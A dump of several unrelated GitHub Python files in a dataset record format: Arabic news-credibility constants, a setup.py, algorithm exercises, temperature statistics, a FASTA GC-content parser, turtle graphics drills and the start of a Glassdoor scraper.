'arabic_verbs.txt')\nENGLISH_VERBS_FILE=os.path.join(RESOURCES_DIR, 'english_verbs.txt')\nSENTIWORDNET_FILE=os.path.join(RESOURCES_DIR, 'SentiWordNet_3.0.0_20130122.txt')\n\nMCE = os.path.join(DATA_DIR, 'mce')\nMCE_PAGES = os.path.join(MCE, 'pages')\nMCE_PAGES_TRUSTED = os.path.join(MCE_PAGES, 'trusted')\nMCE_PAGES_UNTRUSTED = os.path.join(MCE_PAGES, 'untrusted')\n\nMCE_COMPLAINTS = os.path.join(MCE, 'complaints')\nMCE_COMPLAINTS_TRUSTED = os.path.join(MCE_COMPLAINTS, 'trusted')\nMCE_COMPLAINTS_UNTRUSTED = os.path.join(MCE_COMPLAINTS, 'untrusted')\n\nNEWS_HTML_BY_MCE = os.path.join(MCE, 'html')\nTRUSTED_NEWS_HTML_BY_MCE = os.path.join(NEWS_HTML_BY_MCE, 'trusted')\nUNTRUSTED_NEWS_HTML_BY_MCE = os.path.join(NEWS_HTML_BY_MCE, 'untrusted')\n\nANALYSIS_LOG_DIR = os.path.join(LOG_DIR, 'analysis')\n\n# Log levels\nLOG_INFO_LEVEL = 'INFO'\nLOG_ERROR_LEVEL = 'ERROR'\n\n# News sites names\nAHRAM='Alahram.Newspaper'\nAKHBAR='akhbarelyomgate'\nALMASRY_ELYOM='almasryalyoum'\nBBC_ARABIC='bbcarabicnews'\nCNN_ARABIC='cnnarabic'\nDOSTOR='aldostornews'\nDOSTOR_ASLY='El.Dostor.News'\nFAGR='elfagr'\nMASRAWY='masrawy'\nSHOROUK='shorouknews'\nTAHRIR='Tahrir.News.Official'\nWATAN='ElWatanNews'\nYOUM7='officialyoum77'\n# NOT IN FB\n#HURRYH='hurryh'\nFJP='fjp'\nENGLISH_FJP='englishFjp'\nENGLISH_AHRAM='englishAhram'\n# supported by MCE Watch\nAKHBAR_MASR='akhbarmasr'\nRASD='rasd'\nMASRYOON='almasryoon'\nWAFD='alwafd'\nAKHBAR_ELYOM='akhbarelyom'\nBADIL='elbadil'\n\nEXTRA_MCE_SOURCES = [AKHBAR_MASR, RASD, MASRYOON, WAFD, AKHBAR_ELYOM, BADIL, DOSTOR, AHRAM]\nALL_MCE_SOURCES = EXTRA_MCE_SOURCES + [ALMASRY_ELYOM, SHOROUK, FJP, DOSTOR_ASLY, YOUM7, MASRAWY, TAHRIR, WATAN, FAGR]\n\n# News feeds tags\nACCIDENTS='accidents'\nALL='all'\nARTICLES='articles'\nCASES='cases'\nEGYPT='egypt'\nINVESTIGATIONS='investigations'\nLATEST='latest'\nMIDEAST='mideast'\nPOLITICS='politics'\nWORLD='world'\n\n# Classified news tags\nAHRAM_ACCIDENTS='{0}-{1}'.format(AHRAM, ACCIDENTS)\nAHRAM_CASES='{0}-{1}'.format(AHRAM, CASES)\nAHRAM_EGYPT='{0}-{1}'.format(AHRAM, EGYPT)\nAHRAM_INVESTIGATIONS='{0}-{1}'.format(AHRAM, INVESTIGATIONS)\nAHRAM_POLITICS='{0}-{1}'.format(AHRAM, POLITICS)\nALMASRY_ELYOM_ACCIDENTS='{0}-{1}'.format(ALMASRY_ELYOM, ACCIDENTS)\nALMASRY_ELYOM_EGYPT='{0}-{1}'.format(ALMASRY_ELYOM, EGYPT)\nALMASRY_ELYOM_INVESTIGATIONS='{0}-{1}'.format(ALMASRY_ELYOM, INVESTIGATIONS)\nCNN_ARABIC_LATEST='{0}-{1}'.format(CNN_ARABIC, LATEST)\nCNN_ARABIC_MIDEAST='{0}-{1}'.format(CNN_ARABIC, MIDEAST)\nCNN_ARABIC_WORLD='{0}-{1}'.format(CNN_ARABIC, WORLD)\nDOSTOR_ASLY_ACCIDENTS='{0}-{1}'.format(DOSTOR_ASLY, ACCIDENTS)\nDOSTOR_ASLY_ALL='{0}-{1}'.format(DOSTOR_ASLY, ALL)\nDOSTOR_ASLY_POLITICS='{0}-{1}'.format(DOSTOR_ASLY, POLITICS)\nENGLISH_AHRAM_ALL='{0}-{1}'.format(ENGLISH_AHRAM, ALL)\nENGLISH_AHRAM_EGYPT='{0}-{1}'.format(ENGLISH_AHRAM, EGYPT)\nENGLISH_AHRAM_WORLD='{0}-{1}'.format(ENGLISH_AHRAM, WORLD)\nFAGR_ACCIDENTS='{0}-{1}'.format(FAGR, ACCIDENTS)\nFAGR_EGYPT='{0}-{1}'.format(FAGR, EGYPT)\n#FAGR_LATEST='{0}-{1}'.format(FAGR, LATEST)\nFAGR_WORLD='{0}-{1}'.format(FAGR, WORLD)\nFJP_ALL='{0}-{1}'.format(FJP, ALL)\nFJP_ARTICLES='{0}-{1}'.format(FJP, ARTICLES)\nFJP_INVESTIGATIONS='{0}-{1}'.format(FJP, INVESTIGATIONS)\nFJP_MIDEAST='{0}-{1}'.format(FJP, MIDEAST)\nMASRAWY_ACCIDENTS='{0}-{1}'.format(MASRAWY, ACCIDENTS)\nMASRAWY_MIDEAST='{0}-{1}'.format(MASRAWY, MIDEAST)\nMASRAWY_POLITICS='{0}-{1}'.format(MASRAWY, POLITICS)\nMASRAWY_WORLD='{0}-{1}'.format(MASRAWY, WORLD)\nSHOROUK_ACCIDENTS='{0}-{1}'.format(SHOROUK, ACCIDENTS)\nSHOROUK_MIDEAST='{0}-{1}'.format(SHOROUK, MIDEAST)\nSHOROUK_POLITICS='{0}-{1}'.format(SHOROUK, POLITICS)\nSHOROUK_WORLD='{0}-{1}'.format(SHOROUK, WORLD)\nWATAN_ACCIDENTS='{0}-{1}'.format(WATAN, ACCIDENTS)\nWATAN_INVESTIGATIONS='{0}-{1}'.format(WATAN, INVESTIGATIONS)\nWATAN_LATEST='{0}-{1}'.format(WATAN, LATEST)\nWATAN_POLITICS='{0}-{1}'.format(WATAN, POLITICS)\nYOUM7_ACCIDENTS='{0}-{1}'.format(YOUM7, ACCIDENTS)\nYOUM7_ARTICLES='{0}-{1}'.format(YOUM7, ARTICLES)\nYOUM7_LATEST='{0}-{1}'.format(YOUM7, LATEST)\n\n#DOSTOR website is usually down!\n#HURRYUH is no longer supported\n#ELFAGR-LATEST doesn't send feeds!\n#AHRAM removed support for RSS!\nRSS_LABELS=[AKHBAR, #AHRAM_EGYPT, AHRAM_INVESTIGATIONS,\n #AHRAM_POLITICS, AHRAM_ACCIDENTS, AHRAM_CASES,\n ALMASRY_ELYOM_ACCIDENTS,\n ALMASRY_ELYOM_EGYPT, ALMASRY_ELYOM_INVESTIGATIONS,\n BBC_ARABIC, CNN_ARABIC_LATEST, CNN_ARABIC_MIDEAST,\n CNN_ARABIC_WORLD, DOSTOR_ASLY_ACCIDENTS,\n DOSTOR_ASLY_ALL, DOSTOR_ASLY_POLITICS,\n ENGLISH_AHRAM_ALL, ENGLISH_AHRAM_EGYPT,\n ENGLISH_AHRAM_WORLD, ENGLISH_FJP, FAGR_ACCIDENTS,\n FAGR_EGYPT, FAGR_WORLD, WATAN_ACCIDENTS, FJP_ALL,\n FJP_ARTICLES, FJP_INVESTIGATIONS,FJP_MIDEAST,\n WATAN_INVESTIGATIONS, WATAN_LATEST, WATAN_POLITICS,\n MASRAWY_ACCIDENTS, MASRAWY_MIDEAST, MASRAWY_POLITICS,\n MASRAWY_WORLD, YOUM7_ACCIDENTS, YOUM7_ARTICLES,\n YOUM7_LATEST, SHOROUK_ACCIDENTS, SHOROUK_MIDEAST,\n SHOROUK_POLITICS, SHOROUK_WORLD, TAHRIR]\n\nRSS_POLITICS_LABELS=[AKHBAR, ALMASRY_ELYOM_EGYPT, BBC_ARABIC,\n CNN_ARABIC_MIDEAST, DOSTOR_ASLY_POLITICS,\n FAGR_EGYPT, FJP_ALL, WATAN_POLITICS,\n MASRAWY_POLITICS, YOUM7_LATEST,\n SHOROUK_POLITICS, TAHRIR]\n\nFB_PAGES=[AHRAM, AKHBAR, ALMASRY_ELYOM, BBC_ARABIC, CNN_ARABIC,\n DOSTOR, DOSTOR_ASLY, FAGR, SHOROUK, TAHRIR, WATAN,\n YOUM7]\n\nTRANSLATE_TABLE = dict((ord(ch), None) for ch in string.punctuation + string.digits)\nTRANSLATE_TABLE[ord(u'أ')] = ord(u'ا')\nTRANSLATE_TABLE[ord(u'آ')] = ord(u'ا')\nTRANSLATE_TABLE[ord(u'إ')] = ord(u'ا')\nTRANSLATE_TABLE[ord(u'ى')] = ord(u'ي')\n#TRANSLATE_TABLE[ord(u'ؤ')] = ord(u'ء')\n#TRANSLATE_TABLE[ord(u'ئ')] = ord(u'ء')\n#TRANSLATE_TABLE[ord(u'ة')] = ord(u'ه')\nTRANSLATE_TABLE[ord(u'ْ')] = None\nTRANSLATE_TABLE[ord(u'ُ')] = None\nTRANSLATE_TABLE[ord(u'`')] = None\nTRANSLATE_TABLE[ord(u'ٌ')] = None\nTRANSLATE_TABLE[ord(u'ً')] = None\nTRANSLATE_TABLE[ord(u'َ')] = None\nTRANSLATE_TABLE[ord(u'؛')] = None\nTRANSLATE_TABLE[ord(u'~')] = None\nTRANSLATE_TABLE[ord(u'ِ')] = None\nTRANSLATE_TABLE[ord(u'ـ')] = None\nTRANSLATE_TABLE[ord(u'،')] = None\nTRANSLATE_TABLE[ord(u'؟')] = None\nTRANSLATE_TABLE[ord(u'¦')] = None\nTRANSLATE_TABLE[ord(u'»')] = None\nTRANSLATE_TABLE[ord(u'«')] = None\nTRANSLATE_TABLE[ord(u'”')] = None\nTRANSLATE_TABLE[ord(u'“')] = None\n\n\ndef PREPROCESS_MCE_WATCH_JUDGE_CRITERIA(txt):\n whitespace_table = dict([(ord(ch), None) for ch in string.whitespace])\n return txt.strip().translate(TRANSLATE_TABLE).translate(whitespace_table)\n\nMCE_WATCH_HAS_WRONG_INFO = PREPROCESS_MCE_WATCH_JUDGE_CRITERIA(u'الخبر يحتوي على معلومات خاطئة او مغلوطة أو ناقصة (1 درجات)')\nMCE_WATCH_NO_HOW_INFO_GOT = PREPROCESS_MCE_WATCH_JUDGE_CRITERIA(u'الخبر لا يشير الى كيفية الحصول على المعلومة (0.5 درجات)')\nMCE_WATCH_NO_ANSWER_WHY = PREPROCESS_MCE_WATCH_JUDGE_CRITERIA(u'الخبر لا يُجيب على سؤال “لما��ا” ؟ (0.5 درجات)')\nMCE_WATCH_MISLEADING_TITLE = PREPROCESS_MCE_WATCH_JUDGE_CRITERIA(u'الخبر يحتوي عنوان مخالف للنص (2 درجات)')\nMCE_WATCH_MISLEADING_VIDEO = PREPROCESS_MCE_WATCH_JUDGE_CRITERIA(u'الفيديو مخالف او متعارض مع نص الخبر (2 درجات)')\nMCE_WATCH_WRONG_TEMPORAL_SEQUENCE = PREPROCESS_MCE_WATCH_JUDGE_CRITERIA(u'التسلسل الزمني للخبر غير سليم (2 درجات)')\nMCE_WATCH_NO_ANSWER_HOW = PREPROCESS_MCE_WATCH_JUDGE_CRITERIA(u'الخبر لا يُجيب على سؤال “كيف” ؟ (0.5 درجات)')\nMCE_WATCH_BIASED = PREPROCESS_MCE_WATCH_JUDGE_CRITERIA(u'الخبر غير حيادي ومنحاز (2 درجات)')\nMCE_WATCH_NO_ANSWER_WHEN = PREPROCESS_MCE_WATCH_JUDGE_CRITERIA(u'الخبر لا يُجيب على سؤال “متى”؟ (1 درجات)')\nMCE_WATCH_NO_ANSWER_WHERE = PREPROCESS_MCE_WATCH_JUDGE_CRITERIA(u'الخبر لا يُجيب على سؤال “أين” ؟ (1 درجات)')\nMCE_WATCH_WRONG_STATISTICS = PREPROCESS_MCE_WATCH_JUDGE_CRITERIA(u'الخبر يحتوي على ارقام او بيانات او احصائيات غير دقيقة (2 درجات)')\nMCE_WATCH_NO_SOURCE = PREPROCESS_MCE_WATCH_JUDGE_CRITERIA(u'الخبر لا يشير الى هوية المصدر (2 درجات)')\nMCE_WATCH_NO_ANSWER_WHO = PREPROCESS_MCE_WATCH_JUDGE_CRITERIA(u'الخبرلا يُجيب على سؤال “من” ؟ (4 درجات)')\nMCE_WATCH_WRONG_PICS = PREPROCESS_MCE_WATCH_JUDGE_CRITERIA(u'الخبر يحتوي على صور غير سليمة او تم التلاعب بها (1 درجات)')\nMCE_WATCH_OLD_POSTED_AS_NEW = PREPROCESS_MCE_WATCH_JUDGE_CRITERIA(u'خبر قديم نشر على انه خير جديد (3 درجات)')\nMCE_WATCH_WRONG_NEWS = PREPROCESS_MCE_WATCH_JUDGE_CRITERIA(u'الخبرغير صحيح ! (6 درجات)')\n\nMCE_WATCH_JUDGMENT_CRITERIA = [MCE_WATCH_HAS_WRONG_INFO,\n MCE_WATCH_NO_HOW_INFO_GOT,\n MCE_WATCH_NO_ANSWER_WHY,\n MCE_WATCH_MISLEADING_TITLE,\n MCE_WATCH_MISLEADING_VIDEO,\n MCE_WATCH_WRONG_TEMPORAL_SEQUENCE,\n MCE_WATCH_NO_ANSWER_HOW,\n MCE_WATCH_BIASED,\n MCE_WATCH_NO_ANSWER_WHEN,\n MCE_WATCH_NO_ANSWER_WHERE,\n MCE_WATCH_WRONG_STATISTICS,\n MCE_WATCH_NO_SOURCE,\n MCE_WATCH_NO_ANSWER_WHO,\n MCE_WATCH_WRONG_PICS,\n MCE_WATCH_OLD_POSTED_AS_NEW,\n MCE_WATCH_WRONG_NEWS]\n\nMCE_WATCH_SOURCES_MAPPING = {u'اخبار مصر': AKHBAR_MASR,\n u'masrawy': MASRAWY,\n u'egypt': ALMASRY_ELYOM,\n u'رصد': RASD,\n u'المصريون': MASRYOON,\n u'الحرية و العدالة': FJP,\n u'الشروق': SHOROUK,\n u'الوفد': WAFD,\n u'اخبار اليوم': AKHBAR_ELYOM,\n u'التحرير': TAHRIR,\n u'الدستور الاصلي': DOSTOR_ASLY,\n u'اليوم السابع': YOUM7,\n u'البديل': BADIL,\n u'new dostor': DOSTOR,\n u'الوطن': WATAN,\n u'1094': AHRAM,\n u'الفجر': FAGR}\n\nBUCKWALTER_TO_UNICODE = {36: u'\\u0634',\n 38: u'\\u0624',\n 39: u'\\u0621',\n 42: u'\\u0630',\n 60: u'\\u0625',\n 62: u'\\u0623',\n 65: u'\\u0627',\n 68: u'\\u0636',\n 69: u'\\u0639',\n 70: u'\\u064b',\n 72: u'\\u062d',\n 75: u'\\u064d',\n 78: u'\\u064c',\n 83: u'\\u0635',\n 84: u'\\u0637',\n 89: u'\\u0649',\n 90: u'\\u0638',\n 95: u'\\u0640',\n 96: u'\\u0670',\n 97: u'\\u064e',\n 98: u'\\u0628',\n 100: u'\\u062f',\n 102: u'\\u0641',\n 103: u'\\u063a',\n 104: u'\\u0647',\n 105: u'\\u0650',\n 106: u'\\u062c',\n 107: u'\\u0643',\n 108: u'\\u0644',\n 109: u'\\u0645',\n 110: u'\\u0646',\n 111: u'\\u0652',\n 112: u'\\u0629',\n 113: u'\\u0642',\n 114: u'\\u0631',\n 115: u'\\u0633',\n 116: u'\\u062a',\n 117: u'\\u064f',\n 118: u'\\u062b',\n 119: u'\\u0648',\n 120: u'\\u062e',\n 121: u'\\u064a',\n 122: u'\\u0632',\n 123: u'\\u0671',\n 124: u'\\u0622',\n 125: u'\\u0626',\n 126: u'\\u0651'}\n\nUNICODE_TO_BUCKWALTER = {1569: 39,\n 1570: 124,\n 1571: 62,\n 1572: 38,\n 1573: 60,\n 1574: 125,\n 1575: 65,\n 1576: 98,\n 1577: 112,\n 1578: 116,\n 1579: 118,\n 1580: 106,\n 1581: 72,\n 1582: 120,\n 1583: 100,\n 1584: 42,\n 1585: 114,\n 1586: 122,\n 1587: 115,\n 1588: 36,\n 1589: 83,\n 1590: 68,\n 1591: 84,\n 1592: 90,\n 1593: 69,\n 1594: 103,\n 1600: 95,\n 1601: 102,\n 1602: 113,\n 1603: 107,\n 1604: 108,\n 1605: 109,\n 1606: 110,\n 1607: 104,\n 1608: 119,\n 1609: 89,\n 1610: 121,\n 1611: 70,\n 1612: 78,\n 1613: 75,\n 1614: 97,\n 1615: 117,\n 1616: 105,\n 1617: 126,\n 1618: 111,\n 1648: 96,\n 1649: 123}","repo_name":"ibraaaa/news-credibility","sub_path":"src/python/util/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":15081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25611652223","text":"from setuptools import setup\nfrom codecs import open\nfrom os import path\n\nhere = path.abspath(path.dirname(__file__))\n\n# Get the long description from the README file\nwith open(path.join(here, 'README.rst'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name='monitort',\n\n version='1.0.0a1',\n\n description='Asyncio tcp monitor',\n long_description=long_description,\n\n url='https://github.com/teddybear/monitort',\n\n author='Alexey Ismailov',\n author_email='aismailov@ya.ru',\n\n license='MIT',\n\n # See https://pypi.python.org/pypi?%3Aaction=list_classifiers\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Intended Audience :: System Administrators',\n 'Topic :: System :: Systems Administration',\n\n 'License :: OSI Approved :: MIT License',\n\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n ],\n\n keywords='hr test monitor tcp asyncio',\n\n py_modules=[\"monitort\"],\n\n install_requires=[\"aiohttp\", \"motor\"],\n\n\n entry_points={\n 'console_scripts': [\n 'monitort-rest=monitort.rest:main',\n 'monitort-checker=monitort.checker:main',\n ],\n },\n)\n","repo_name":"teddybear/monitort","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15346902804","text":"# course taken with pre-requisites\n# program buid dependencies\n# can be done using BFS,DFS,and kahn's algorithm\n# https://leetcode.com/problems/course-schedule-ii/\n\n\ndef detect_cycle(node,visited,visiting):\n visited[node]=True\n visiting[node]=True\n for adj in graph[node]:\n if (not visited[adj]) and (detect_cycle(adj,visited,visiting)):\n return True\n elif(visiting[adj]):\n return True\n visiting[node]=False\n return False\n\ndef topological_sort(node):\n \n for adj in graph[node]:\n if(not visited[adj]):\n topological_sort(adj)\n ans.append(node)\n visited[node]=True\n\ndef findOrder(self, numCourses: int, prerequisites: List[List[int]]) -> List[int]:\n \n def topological_sort(node):\n \n for adj in graph[node]:\n if(not visited[adj]):\n topological_sort(adj)\n ans.append(node)\n visited[node]=True\n \n \n \n \n \n \n graph=collections.defaultdict(list)\n for each in prerequisites:\n graph[each[1]].append(each[0])\n \n visited=[False]*numCourses\n visiting=[False]*numCourses\n \n for c in range(numCourses):\n if(not visited[c])and (detect_cycle(c)):\n return []\n visited=[False]*numCourses\n ans=[]\n for t in range(numCourses):\n if(not visited[t]):\n topological_sort(t)\n ans.reverse()\n return ans\n ","repo_name":"faisal-git/Data_Structure","sub_path":"Graphs/Toplogical_sort.py","file_name":"Toplogical_sort.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70762470189","text":"readings = [13.5, 11.1, 17.5, 12.6, 15.3, 12.2, 16.6, 14.6]\n\n\n\n# Step 1: Implement a function to average the temperatures\ndef average(data):\n return sum(data) / len(data)\n\nprint('Starting')\nprint(average(readings))\nprint('Average temperature = {:.2f}'.format(average(readings)))\nprint(f'Average temperature = {average(readings):.2f}')\nprint('Done', (\"-\" * 30))\n\n\n# Step 2: Calculate the median of the data\ndef median(data):\n sorted_data = sorted(data) # Sort the data\n data_length = len(data) # Get the length of the data\n index = (data_length - 1) // 2 # Calculate the index for the median\n\n if data_length % 2 == 1: # Check if the data length is odd\n return sorted_data[index] # Return the value at the calculated index\n else:\n # If the data length is even, calculate the average of the two middle values\n return (sorted_data[index] + sorted_data[index + 1]) / 2.0\n\n\n# Print the median\nprint(f'Median temperature value = {median(readings)}')\nprint('Done', (\"-\" * 30))\n\n\n# minimum and maximum functions\ndef minimum(data, start=0):\n if start < 0 or start >= len(data):\n return None # Invalid start position\n\n min_value = float('inf') # Initialize with positive infinity\n\n for i in range(start, len(data)):\n if data[i] < min_value:\n min_value = data[i]\n\n return min_value\n\n\nprint(f'Min temp in list = {minimum(readings)}')\nprint(f'Min temp in list starting position 4 = {minimum(readings, 3)}')\nprint('Done', (\"-\" * 30))\n\n\ndef maximum(data, start=0):\n if start < 0 or start >= len(data):\n return None # Invalid start position\n\n max_value = float('-inf') # Initialize with negative infinity\n\n for i in range(start, len(data)):\n if data[i] > max_value:\n max_value = readings[i]\n\n return max_value\n\n\nprint(f'Max temp in list = {maximum(readings)}')\nprint(f'Max temp in list starting position 4 = {maximum(readings, 3)}')\nprint('Done', (\"-\" * 30))\n\n\n# Return a data range tuple\ndef data_range(data):\n if not readings:\n return None # Return None if the list is empty\n\n min_temp = float('inf')\n max_temp = float('-inf')\n\n for temperature in data:\n if temperature < min_temp:\n min_temp = temperature\n if temperature > max_temp:\n max_temp = temperature\n\n return min_temp, max_temp # Return a tuple\n\n\nmin_temp, max_temp = data_range(readings)\nprint(f'Range of temperatures from {min_temp} to {max_temp}')\nprint('Done', (\"-\" * 30))\n\n\n# Convert Celsius to Fahrenheit\ndef celsius_to_fahrenheit(celsius):\n return (celsius * 9 / 5) + 32\n\n\ntemperature_celsius = 13.5\ntemperature_fahrenheit = celsius_to_fahrenheit(temperature_celsius)\n\nprint(f'{temperature_celsius} Celsius as Fahrenheit: {temperature_fahrenheit:.2f}')\nprint('Done', (\"-\" * 30))\n\n\n# Convert Fahrenheit into Celsius\ndef fahrenheit_to_celsius(fahrenheit):\n return (fahrenheit - 32) * 5 / 9\n\n\nprint(f'56.3 fahrenheit as celsius - {fahrenheit_to_celsius(56.3):.1f}')\nprint('Done', (\"-\" * 30))\n","repo_name":"momahboobian/python-p","sub_path":"_D2/main_bin5.py","file_name":"main_bin5.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71621669867","text":"import sys\n\nfrom app.SpelloutApp import SpelloutApp\nfrom gui.Gui import Gui\n\n\ndef main():\n try:\n app = SpelloutApp()\n if len(sys.argv) > 1:\n app.load_session(sys.argv[1])\n\n gui = Gui(app)\n gui.run_blocking()\n except RuntimeError as e:\n sys.stderr.write(unicode(e) + '\\n')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"goc9000/spellout","sub_path":"src/spellout.py","file_name":"spellout.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32445236759","text":"import os\npath = \"C:/Users/yasha/Desktop/Python Programming/Rosalind/Data\"\n\ntext = \"\"\"\n>Rosalind_6404\nCCTGCGGAAGATCGGCACTAGAATAGCCAGAACCGTTTCTCTGAGGCTTCCGGCCTTCCC\nTCCCACTAATAATTCTGAGG\n>Rosalind_5959\nCCATCGGTAGCGCATCCTTAGTCCAATTAAGTCCCTATCCAGGCGCTCCGCCGAAGGTCT\nATATCCATTTGTCAGCAGACACGC\n>Rosalind_0808\nCCACCCTCGTGGTATGGCTAGGCATTCAGGAACCGGAGAACGCTTCAGACCAGCCCGGAC\nTGGGAACCTGCGGGCAGTAGGTGGAAT\n\"\"\"\n\ndef gc_content(seq):\n ls = list(seq)\n gc = ls.count('C') + ls.count('G')\n return(gc / len(ls) * 100)\n\ndef parse_fasta(file):\n with open(os.path.join(path, file), \"rt\", newline='') as f:\n gc_content_for_ids = {}\n text_list = f.read().splitlines()\n\n for i, line in enumerate(text_list):\n if line.startswith('>'):\n id = line.strip('>')\n # get next line, containing genomic data\n bp_sequence, bp_idx = \"\", i+1\n while(bp_idx < len(text_list)):\n seq = text_list[bp_idx]\n if not seq.startswith('>'):\n bp_sequence = bp_sequence + seq\n bp_idx += 1\n else:\n break\n # parse\n gc_score_id = gc_content(bp_sequence)\n gc_content_for_ids[gc_score_id] = id\n\n mx_gc = max(gc_content_for_ids.keys())\n print(gc_content_for_ids.get(mx_gc))\n print(mx_gc) \n\n# better version...\ndef parse_fasta_(file):\n with open(os.path.join(path, file), \"r\", newline='') as f:\n gc_content_for_ids = {}\n hasline = True\n line = f.readline().rstrip()\n\n while(hasline):\n if line.startswith('>'):\n id = line.strip('>')\n bp_sequence = \"\"\n line = f.readline().rstrip()\n while(line is not ''):\n if not line.startswith('>'):\n bp_sequence = bp_sequence + line\n line = f.readline().rstrip()\n else:\n break\n # parse\n gc_score_id = gc_content(bp_sequence)\n gc_content_for_ids[gc_score_id] = id\n \n if(line == ''):\n print(\"Finished Parsing\")\n hasline = False\n mx_gc = max(gc_content_for_ids.keys())\n print(gc_content_for_ids.get(mx_gc))\n print(mx_gc) \n\n\nif __name__ == \"__main__\":\n parse_fasta(\"old/rosalind_gc.txt\")\n parse_fasta_(\"old/rosalind_gc.txt\")\n########################## solution\n\n\n# def fastaread(filehandle):\n\n# # Initialize some arrays to return first\n# fastaid = []\n# seqarray = []\n\n# # Open file\n# f = openandread(handle)\n\n# # First while True:/Break idiom to pass any and all blank spaces\n# while True:\n# line = f.readline\n# if line is empty:\n# return\n# if line[0] is '>': # If we find a fasta id however, then we break\n# break\n\n# # Now we'll start our other while True:/Break idiom\n# # This one will find the fasta record, put that record in an array.\n# # Then until the next record or end of file is encountered, it will\n# # read in all the lines and return that sequence\n\n# while True:\n# if not line.startswith('>'):\n# raise Error(\n# \"Records in FASTA files should start with '>' character\")\n\n# title = line[1:end].rstrip()\n# fastaid.append(title)\n\n# # Initialize our seqdata variable. This one will store one single sequence\n# seqdata = []\n\n# line = f.readline()\n\n# # This second while True:/Break idiom extract the sequence data\n# while True:\n# if not line:\n# break\n# if line [0] == '>': # Check to see if we're onto the next record\n# break\n# seqdata.append(line.rstrip())\n# line = f.readline()\n\n# # Take the data in seqdata and join it together and add to the seqarray\n# nts = ''.join(seqdata).replace(\" \", \"\").replace(\"\\r\", \"\")\n# seqarray.append(nts)\n\n# # If we're at the end of the document we'll go ahead and return our array\n# # of ids and sequences\n# if not line:\n# return fastaid, seqarray\n\n# def percentgc(fastaids, seqarray):\n\n# # Finds the gc content of sequences in FASTA files\n\n# # Initialize our seqgc variable\n# # This stores all the %gc vals for seq\n# seqgc = [];\n\n# # First we need to check if the two arrays are of\n# # the same length, i.e., have the same number of\n# # elements in them\n\n# if len(fastaids) != len(seqarray):\n# return ValueError(\n# \"The number of records and sequences is not the same. Try again.\")\n\n# for seq in seqarray:\n# gccount = seq.count('G') + seq.count('C')\n# totcount = len(seq)\n# seqgc.append(100*gccount/totcount)\n\n# # Find the max value and index and return the fasta id and %gc\n# max_gc = max(seqgc)\n# max_index = seqgc.index(max_gc)\n\n# print fastaids[max_index]\n# print max_gc","repo_name":"jshkrob/Rosalind-Answers","sub_path":"Code/GC-Content.py","file_name":"GC-Content.py","file_ext":"py","file_size_in_byte":5163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71330160749","text":"# The isBadVersion API is already defined.\n# def isBadVersion(version: int) -> bool:\n\ndef binSearch(self, l, r):\n # if r - l == 0:\n # return False\n mid = (l + r) // 2\n\n if isBadVersion(mid) == False:\n if isBadVersion(mid + 1) == True:\n return mid + 1\n else:\n return binSearch(self, mid + 1, r)\n\n else:\n if isBadVersion(mid - 1) == False:\n return mid\n else:\n return binSearch(self, l, mid - 1)\n\n\nclass Solution:\n def firstBadVersion(self, n: int) -> int:\n l = 1\n r = n\n\n x = (binSearch(self, l, r))\n\n return x\n","repo_name":"shubh-2012/DSAwithPython","sub_path":"Leetcode/firstBadVersion.py","file_name":"firstBadVersion.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"1653005819","text":"import turtle\n\n# changing line color\n# painter = turtle.Turtle()\n#\n# painter.pencolor(\"blue\")\n# for i in range(50):\n# painter.forward(50)\n# painter.left(123) # Let's go counterclockwise this time\n#\n# painter.pencolor(\"red\")\n# for i in range(50):\n# painter.forward(100)\n# painter.left(123)\n\n\n\n# changing line color https://www.webpagefx.com/web-design/color-picker/\n# painter2 = turtle.Turtle()\n#\n# painter2.pencolor(\"#32D486\")\n# painter2.forward(90)\n#\n# painter2.pencolor(\"#D6305F\")\n# painter2.forward(90)\n\n\n\n# nested loops\n# seurat = turtle.Turtle()\n#\n# dot_distance = 25\n# width = 5\n# height = 7\n#\n# seurat.penup()\n#\n# for y in range(height):\n# for i in range(width):\n# seurat.dot()\n# seurat.forward(dot_distance)\n# seurat.backward(dot_distance * width)\n# seurat.right(90)\n# seurat.forward(dot_distance)\n# seurat.left(90)\n\n\n\n# jumping around and changing speed\n# The speed cannot be lesser then 0 or greater then 10. 0=warpspeed and will draw as fast as it can\n# turtle.setposition(x, y) will set the turtle’s position to the coordinates you plug in. (0, 0) is located at the center of the screen\n\nninja = turtle.Turtle()\n\nninja.speed(0)\n\nfor i in range(180):\n ninja.forward(100)\n ninja.right(30)\n ninja.forward(20)\n ninja.left(60)\n ninja.forward(50)\n ninja.right(30)\n\n ninja.penup()\n ninja.setposition(0, 0)\n ninja.pendown()\n\n ninja.right(2)\n\n\nturtle.done()","repo_name":"Miky9/Py-BasicSyntax","sub_path":"PyCode_Ostrava_2017/02_turtle2.py","file_name":"02_turtle2.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32809965791","text":"\"\"\"\nCreated on Sat Jun 12 20:47:42 2021\n\nCredit: Kenarapfaik\n@author: Olohireme\nurl: https://github.com/arapfaik/scraping-glassdoor-selenium\n\"\"\"\nfrom selenium.common.exceptions import NoSuchElementException, ElementClickInterceptedException\nfrom selenium import webdriver\nimport time\nimport pandas as pd\nfrom time import sleep\nimport random\n\npath = 